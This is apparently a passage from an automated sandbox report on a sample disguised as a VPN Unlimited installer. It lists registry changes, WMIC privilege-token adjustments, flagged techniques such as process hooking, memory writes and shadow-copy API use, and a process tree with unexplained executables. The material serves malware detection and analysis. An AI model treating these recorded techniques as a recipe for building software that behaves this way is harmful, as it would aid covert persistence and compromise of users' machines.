| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1\27DD5200959A5B540A3AE7EF1BA50805 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14 | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\ProductName = "Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\Version = "237272852" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.30,bundle | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\ = "{D5D19E2F-7189-42FE-8103-92CD1FA457C2}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\Version = "14.36.32532.0" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\VC_Runtime_Minimum | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\ = "{0025DD72-A959-45B5-A0A3-7EFEB15A8050}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Net\1 = "C:\\ProgramData\\Package Cache\\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\ = "{8bdfe669-9705-4184-9368-db9ce581e0e7}" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\PackageName = "vc_runtimeMinimum_x64.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\\packages\\vcRuntimeMinimum_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\Dependents\{8bdfe669-9705-4184-9368-db9ce581e0e7} | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\MICROSOFT.VS.VC_RUNTIMEMINIMUMVSU_AMD64,V14\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command\ = "\"C:\\Program Files (x86)\\VPN Unlimited\\vpn-unlimited-launcher.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\Dependents | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\ProductName = "Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\Version = "237272852" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.30,bundle\Dependents | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\Version = "14.36.32532" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\27DD5200959A5B540A3AE7EF1BA50805\VC_Runtime_Additional | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\Provider | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\27DD5200959A5B540A3AE7EF1BA50805\Servicing_Key | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F2E91D5D9817EF24183029DCF14A752C\Servicing_Key | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.36,bundle\DisplayName = "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\MICROSOFT.VS.VC_RUNTIMEADDITIONALVSU_AMD64,V14\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\URL Protocol | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F2E91D5D9817EF24183029DCF14A752C\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe
"C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe"
C:\Users\Admin\AppData\Local\Temp\jgt.exe
"C:\Users\Admin\AppData\Local\Temp\jgt.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\Install(4).exe
"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"
C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe
